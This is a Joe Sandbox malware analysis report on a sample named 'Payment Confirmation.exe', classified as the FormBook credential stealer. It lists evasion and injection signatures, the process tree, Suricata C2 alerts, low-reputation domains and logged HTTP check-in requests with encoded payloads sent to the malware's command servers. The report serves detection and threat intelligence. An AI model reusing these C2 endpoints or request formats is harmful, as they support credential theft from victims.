Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Payment Confirmation.exe

Overview

General Information

Sample name:Payment Confirmation.exe
Analysis ID:1665536
MD5:259c57c7a4c9d2920821233d0f42b01a
SHA1:a91511c9bd6c4b826be1a3cf8cecf43649189a3f
SHA256:f190d00b8327b3dbd653ad7aaacc15df1ccfdf4a4c780fe55249f3068df51fae
Tags:exeuser-threatcat_ch
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Confidence:100%

Signatures

Antivirus detection for URL or domain
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected FormBook
Found direct / indirect Syscall (likely to bypass EDR)
Initial sample is a PE file and has a suspicious name
Injects a PE file into a foreign processes
Joe Sandbox ML detected suspicious sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • Payment Confirmation.exe (PID: 7724 cmdline: "C:\Users\user\Desktop\Payment Confirmation.exe" MD5: 259C57C7A4C9D2920821233D0F42B01A)
    • Payment Confirmation.exe (PID: 4780 cmdline: "C:\Users\user\Desktop\Payment Confirmation.exe" MD5: 259C57C7A4C9D2920821233D0F42B01A)
      • yT3kwEipvxIo4KXERrb.exe (PID: 6712 cmdline: "C:\Program Files (x86)\mfyQbcPhqmWFzTNgTDoFAaLrLewzuEgxpaKKAwiZKgOitBelbveNWwNc\hmLbCV9dNfE.exe" MD5: 9C98D1A23EFAF1B156A130CEA7D2EE3A)
        • auditpol.exe (PID: 2576 cmdline: "C:\Windows\SysWOW64\auditpol.exe" MD5: 70DF7973F8D4AAA2EE3B28391239397B)
          • yT3kwEipvxIo4KXERrb.exe (PID: 6644 cmdline: "C:\Program Files (x86)\mfyQbcPhqmWFzTNgTDoFAaLrLewzuEgxpaKKAwiZKgOitBelbveNWwNc\62xrulxZe8.exe" MD5: 9C98D1A23EFAF1B156A130CEA7D2EE3A)
          • firefox.exe (PID: 5156 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
0000000A.00000002.3731694034.0000000003A60000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    0000000A.00000002.3731637092.0000000003A10000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      0000000B.00000002.3733429458.0000000004A70000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        00000007.00000002.1549027122.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          0000000A.00000002.3729621746.0000000003300000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
            Click to see the 4 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            7.2.Payment Confirmation.exe.400000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
              7.2.Payment Confirmation.exe.400000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security

                Sigma Signatures

                No Sigma rule has matched

                Suricata Signatures

                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2025-04-15T16:29:49.099163+020028554651A Network Trojan was detected192.168.2.549694200.147.100.5380TCP
                2025-04-15T16:30:12.528469+020028554651A Network Trojan was detected192.168.2.5496993.33.130.19080TCP
                2025-04-15T16:30:26.148735+020028554651A Network Trojan was detected192.168.2.549703104.21.16.180TCP
                2025-04-15T16:30:40.506720+020028554651A Network Trojan was detected192.168.2.549707217.70.184.5080TCP
                2025-04-15T16:30:54.965420+020028554651A Network Trojan was detected192.168.2.54971113.248.169.4880TCP
                2025-04-15T16:31:08.620802+020028554651A Network Trojan was detected192.168.2.549715172.67.144.16080TCP
                2025-04-15T16:31:22.289431+020028554651A Network Trojan was detected192.168.2.549719209.74.80.15080TCP
                2025-04-15T16:31:36.744107+020028554651A Network Trojan was detected192.168.2.54972313.248.169.4880TCP
                2025-04-15T16:32:02.647585+020028554651A Network Trojan was detected192.168.2.54972713.248.169.4880TCP
                2025-04-15T16:32:27.443349+020028554651A Network Trojan was detected192.168.2.54973113.248.169.4880TCP
                2025-04-15T16:32:41.153019+020028554651A Network Trojan was detected192.168.2.549735104.21.27.20380TCP
                2025-04-15T16:32:56.646706+020028554651A Network Trojan was detected192.168.2.54973913.248.169.4880TCP
                2025-04-15T16:33:11.330689+020028554651A Network Trojan was detected192.168.2.54974381.169.145.8480TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2025-04-15T16:30:04.571397+020028554641A Network Trojan was detected192.168.2.5496963.33.130.19080TCP
                2025-04-15T16:30:07.214578+020028554641A Network Trojan was detected192.168.2.5496973.33.130.19080TCP
                2025-04-15T16:30:09.899717+020028554641A Network Trojan was detected192.168.2.5496983.33.130.19080TCP
                2025-04-15T16:30:18.104686+020028554641A Network Trojan was detected192.168.2.549700104.21.16.180TCP
                2025-04-15T16:30:20.796699+020028554641A Network Trojan was detected192.168.2.549701104.21.16.180TCP
                2025-04-15T16:30:23.371681+020028554641A Network Trojan was detected192.168.2.549702104.21.16.180TCP
                2025-04-15T16:30:32.287718+020028554641A Network Trojan was detected192.168.2.549704217.70.184.5080TCP
                2025-04-15T16:30:35.022286+020028554641A Network Trojan was detected192.168.2.549705217.70.184.5080TCP
                2025-04-15T16:30:37.798012+020028554641A Network Trojan was detected192.168.2.549706217.70.184.5080TCP
                2025-04-15T16:30:45.966542+020028554641A Network Trojan was detected192.168.2.54970813.248.169.4880TCP
                2025-04-15T16:30:48.636977+020028554641A Network Trojan was detected192.168.2.54970913.248.169.4880TCP
                2025-04-15T16:30:51.313641+020028554641A Network Trojan was detected192.168.2.54971013.248.169.4880TCP
                2025-04-15T16:31:00.641523+020028554641A Network Trojan was detected192.168.2.549712172.67.144.16080TCP
                2025-04-15T16:31:03.323267+020028554641A Network Trojan was detected192.168.2.549713172.67.144.16080TCP
                2025-04-15T16:31:05.968236+020028554641A Network Trojan was detected192.168.2.549714172.67.144.16080TCP
                2025-04-15T16:31:14.149829+020028554641A Network Trojan was detected192.168.2.549716209.74.80.15080TCP
                2025-04-15T16:31:16.861275+020028554641A Network Trojan was detected192.168.2.549717209.74.80.15080TCP
                2025-04-15T16:31:19.580017+020028554641A Network Trojan was detected192.168.2.549718209.74.80.15080TCP
                2025-04-15T16:31:27.716176+020028554641A Network Trojan was detected192.168.2.54972013.248.169.4880TCP
                2025-04-15T16:31:30.386830+020028554641A Network Trojan was detected192.168.2.54972113.248.169.4880TCP
                2025-04-15T16:31:33.058623+020028554641A Network Trojan was detected192.168.2.54972213.248.169.4880TCP
                2025-04-15T16:31:53.537436+020028554641A Network Trojan was detected192.168.2.54972413.248.169.4880TCP
                2025-04-15T16:31:56.198604+020028554641A Network Trojan was detected192.168.2.54972513.248.169.4880TCP
                2025-04-15T16:31:59.905364+020028554641A Network Trojan was detected192.168.2.54972613.248.169.4880TCP
                2025-04-15T16:32:16.346551+020028554641A Network Trojan was detected192.168.2.54972813.248.169.4880TCP
                2025-04-15T16:32:19.008251+020028554641A Network Trojan was detected192.168.2.54972913.248.169.4880TCP
                2025-04-15T16:32:21.730000+020028554641A Network Trojan was detected192.168.2.54973013.248.169.4880TCP
                2025-04-15T16:32:33.152960+020028554641A Network Trojan was detected192.168.2.549732104.21.27.20380TCP
                2025-04-15T16:32:35.808867+020028554641A Network Trojan was detected192.168.2.549733104.21.27.20380TCP
                2025-04-15T16:32:38.478376+020028554641A Network Trojan was detected192.168.2.549734104.21.27.20380TCP
                2025-04-15T16:32:46.597584+020028554641A Network Trojan was detected192.168.2.54973613.248.169.4880TCP
                2025-04-15T16:32:49.264399+020028554641A Network Trojan was detected192.168.2.54973713.248.169.4880TCP
                2025-04-15T16:32:51.935090+020028554641A Network Trojan was detected192.168.2.54973813.248.169.4880TCP
                2025-04-15T16:33:02.599568+020028554641A Network Trojan was detected192.168.2.54974081.169.145.8480TCP
                2025-04-15T16:33:05.361560+020028554641A Network Trojan was detected192.168.2.54974181.169.145.8480TCP
                2025-04-15T16:33:08.132826+020028554641A Network Trojan was detected192.168.2.54974281.169.145.8480TCP

                Joe Sandbox Signatures

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Antivirus detection for URL or domain
                Source: http://www.venturegioballng.fun/gg0c/Avira URL Cloud: Label: malware
                Source: http://www.venturegioballng.fun/gg0c/?slIx=g0AT78l8mTqVe7boqMXjGRmSE0wqnDlb+F/r8sxxoF+RqpA299JGbXJ4ZA0tjoRIog9mEGsNT+rHGNL9Q1Iz2hHxFvFKDuT+iosMrtGmmoWKojnO/1i3c7q3qwHF8zvfwA==&Fd=GFVtMVdh-dnDdAvira URL Cloud: Label: malware
                Source: http://www.full4movies.christmas/0by2/?Fd=GFVtMVdh-dnDd&slIx=Xkvyqp+XZLKZU589TKRz7G6wpBuaXd0vN6gjsxC0kkeXdHL11jMVdUY60z58AKK0JzCQFYYyiKoBtZI4Oma89bfmIAUiHCvCZ4a4/Cs8RjaSheXxzQX3fo1AsGwPUZxaxw==Avira URL Cloud: Label: malware
                Source: http://www.full4movies.christmas/0by2/Avira URL Cloud: Label: malware
                Multi AV Scanner detection for submitted file
                Source: Payment Confirmation.exeVirustotal: Detection: 30%Perma Link
                Source: Payment Confirmation.exeReversingLabs: Detection: 36%
                Yara detected FormBook
                Source: Yara matchFile source: 7.2.Payment Confirmation.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 7.2.Payment Confirmation.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0000000A.00000002.3731694034.0000000003A60000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000A.00000002.3731637092.0000000003A10000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000B.00000002.3733429458.0000000004A70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.1549027122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000A.00000002.3729621746.0000000003300000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.1551387798.0000000001D40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.1551550451.0000000003B90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000009.00000002.3731554872.0000000004B00000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Joe Sandbox ML detected suspicious sample
                Source: Submited SampleNeural Call Log Analysis: 91.6%
                Source: Payment Confirmation.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: Payment Confirmation.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: Binary string: trbp.pdb source: Payment Confirmation.exe
                Source: Binary string: auditpol.pdbGCTL source: Payment Confirmation.exe, 00000007.00000002.1550004144.0000000001477000.00000004.00000020.00020000.00000000.sdmp, yT3kwEipvxIo4KXERrb.exe, 00000009.00000002.3730747872.00000000010AE000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdbUGP source: Payment Confirmation.exe, 00000007.00000002.1550286836.00000000019A0000.00000040.00001000.00020000.00000000.sdmp, auditpol.exe, 0000000A.00000003.1552521292.0000000003ADD000.00000004.00000020.00020000.00000000.sdmp, auditpol.exe, 0000000A.00000002.3731867390.0000000003C90000.00000040.00001000.00020000.00000000.sdmp, auditpol.exe, 0000000A.00000003.1549442641.0000000003926000.00000004.00000020.00020000.00000000.sdmp, auditpol.exe, 0000000A.00000002.3731867390.0000000003E2E000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: Payment Confirmation.exe, Payment Confirmation.exe, 00000007.00000002.1550286836.00000000019A0000.00000040.00001000.00020000.00000000.sdmp, auditpol.exe, auditpol.exe, 0000000A.00000003.1552521292.0000000003ADD000.00000004.00000020.00020000.00000000.sdmp, auditpol.exe, 0000000A.00000002.3731867390.0000000003C90000.00000040.00001000.00020000.00000000.sdmp, auditpol.exe, 0000000A.00000003.1549442641.0000000003926000.00000004.00000020.00020000.00000000.sdmp, auditpol.exe, 0000000A.00000002.3731867390.0000000003E2E000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: auditpol.pdb source: Payment Confirmation.exe, 00000007.00000002.1550004144.0000000001477000.00000004.00000020.00020000.00000000.sdmp, yT3kwEipvxIo4KXERrb.exe, 00000009.00000002.3730747872.00000000010AE000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: trbp.pdbSHA256@} source: Payment Confirmation.exe
                Source: Binary string: C:\Work\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: yT3kwEipvxIo4KXERrb.exe, 00000009.00000002.3729563719.000000000049F000.00000002.00000001.01000000.0000000A.sdmp, yT3kwEipvxIo4KXERrb.exe, 0000000B.00000000.1619731121.000000000049F000.00000002.00000001.01000000.0000000A.sdmp
                Source: C:\Windows\SysWOW64\auditpol.exeCode function: 10_2_0331C9F0 FindFirstFileW,FindNextFileW,FindClose,10_2_0331C9F0
                Source: C:\Windows\SysWOW64\auditpol.exeCode function: 4x nop then xor eax, eax10_2_03309F90
                Source: C:\Windows\SysWOW64\auditpol.exeCode function: 4x nop then mov ebx, 00000004h10_2_03B604F8

                Networking

                barindex
                Suricata IDS alerts for network traffic
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:49703 -> 104.21.16.1:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:49707 -> 217.70.184.50:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49736 -> 13.248.169.48:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:49694 -> 200.147.100.53:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49712 -> 172.67.144.160:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49696 -> 3.33.130.190:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49713 -> 172.67.144.160:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49728 -> 13.248.169.48:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49716 -> 209.74.80.150:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49697 -> 3.33.130.190:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49714 -> 172.67.144.160:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49730 -> 13.248.169.48:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49702 -> 104.21.16.1:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49729 -> 13.248.169.48:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49709 -> 13.248.169.48:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49720 -> 13.248.169.48:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49705 -> 217.70.184.50:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49704 -> 217.70.184.50:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:49723 -> 13.248.169.48:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49725 -> 13.248.169.48:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49710 -> 13.248.169.48:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49726 -> 13.248.169.48:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:49699 -> 3.33.130.190:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:49711 -> 13.248.169.48:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49722 -> 13.248.169.48:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:49719 -> 209.74.80.150:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49706 -> 217.70.184.50:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49698 -> 3.33.130.190:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49701 -> 104.21.16.1:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:49731 -> 13.248.169.48:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49708 -> 13.248.169.48:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49737 -> 13.248.169.48:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49718 -> 209.74.80.150:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:49735 -> 104.21.27.203:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49717 -> 209.74.80.150:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49740 -> 81.169.145.84:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49734 -> 104.21.27.203:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49724 -> 13.248.169.48:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49741 -> 81.169.145.84:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:49715 -> 172.67.144.160:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49700 -> 104.21.16.1:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49738 -> 13.248.169.48:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:49739 -> 13.248.169.48:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49721 -> 13.248.169.48:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:49743 -> 81.169.145.84:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:49727 -> 13.248.169.48:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49742 -> 81.169.145.84:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49732 -> 104.21.27.203:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49733 -> 104.21.27.203:80
                Performs DNS queries to domains with low reputation
                Source: DNS query: www.globedesign.xyz
                Source: DNS query: www.tieniu09.xyz
                Source: DNS query: www.cryptoannounce.xyz
                Source: DNS query: www.auradesigns.xyz
                Source: DNS query: www.banayad.xyz
                Source: DNS query: www.ekstrak.xyz
                Source: Joe Sandbox ViewIP Address: 104.21.16.1 104.21.16.1
                Source: Joe Sandbox ViewIP Address: 104.21.16.1 104.21.16.1
                Source: Joe Sandbox ViewIP Address: 13.248.169.48 13.248.169.48
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: global trafficHTTP traffic detected: GET /0492/?slIx=+RFH70QffP/l5gXkv8yJZrMeeURTWpAnK9SLzqo1C76iqe99ciJ2uvUFengezhIgVCNJsDhWkVnzTQNbwd2iwBrxgonpzCAyncpYQBj34cyrXmX/aMuXP0VaFlyv1gW21w==&Fd=GFVtMVdh-dnDd HTTP/1.1Host: www.economia.uol.com.brAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0 (Unknown; Linux armv7l) AppleWebKit/537.1+ PBRM/1.0 ( ;LGE ;40LX761H-ZA ;03.10.00 ;0x00000001)
                Source: global trafficHTTP traffic detected: GET /gg0c/?slIx=g0AT78l8mTqVe7boqMXjGRmSE0wqnDlb+F/r8sxxoF+RqpA299JGbXJ4ZA0tjoRIog9mEGsNT+rHGNL9Q1Iz2hHxFvFKDuT+iosMrtGmmoWKojnO/1i3c7q3qwHF8zvfwA==&Fd=GFVtMVdh-dnDd HTTP/1.1Host: www.venturegioballng.funAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0 (Unknown; Linux armv7l) AppleWebKit/537.1+ PBRM/1.0 ( ;LGE ;40LX761H-ZA ;03.10.00 ;0x00000001)
                Source: global trafficHTTP traffic detected: GET /hs6j/?slIx=/JLnrR5eV/Sz3+HZvwvjDyfu1aRi42XoARm9QC1LghbG5TwDSSQube+H0bKnA/+Pq+k6E+NC2/JiF2nAXMxZ0q3lI4JKDZdEI+rkNvmoGoMN7W/hhXbaj/76T0VkGjEhOg==&Fd=GFVtMVdh-dnDd HTTP/1.1Host: www.6644win.momAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0 (Unknown; Linux armv7l) AppleWebKit/537.1+ PBRM/1.0 ( ;LGE ;40LX761H-ZA ;03.10.00 ;0x00000001)
                Source: global trafficHTTP traffic detected: GET /pd80/?slIx=kbwEbvUc/K4ivu2ks83bA3BPX9fZMqGXWljGq7zmQIVC4KJT6nbhOuv3vekgdOG9/5H8Wk8oR/FUb97PF1NeDft93BXzR8/36d9hs7lJNav8gqkE/SgeYoiFD3gHnEIUxA==&Fd=GFVtMVdh-dnDd HTTP/1.1Host: www.curiosa.newsAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0 (Unknown; Linux armv7l) AppleWebKit/537.1+ PBRM/1.0 ( ;LGE ;40LX761H-ZA ;03.10.00 ;0x00000001)
                Source: global trafficHTTP traffic detected: GET /tb41/?slIx=68E2w4zyGhzyUb7PxkJ1PRSOoL/eY22ksnuUmvasnpKOM5tDxNGEcFyeQb4BTZgyvllrJLowXaDGloGbISFzrPo+2jb0wiQxGFBEW52KAAQ4d/a5rdrc7jD+JRb9snKtWg==&Fd=GFVtMVdh-dnDd HTTP/1.1Host: www.globedesign.xyzAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0 (Unknown; Linux armv7l) AppleWebKit/537.1+ PBRM/1.0 ( ;LGE ;40LX761H-ZA ;03.10.00 ;0x00000001)
                Source: global trafficHTTP traffic detected: GET /eojo/?slIx=Yz7YuOaeaKTXEoSJDY2yImq5Ku8i4tf6uM4XxXFlfNcKEEB1WieW1s7C74dLI/78n4Op9cMjhBcg8poKJa0nG+xDD3uhBffmgU1IIJhomkx/NmGp91JN0qV/wLs3yqkw0w==&Fd=GFVtMVdh-dnDd HTTP/1.1Host: www.tieniu09.xyzAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0 (Unknown; Linux armv7l) AppleWebKit/537.1+ PBRM/1.0 ( ;LGE ;40LX761H-ZA ;03.10.00 ;0x00000001)
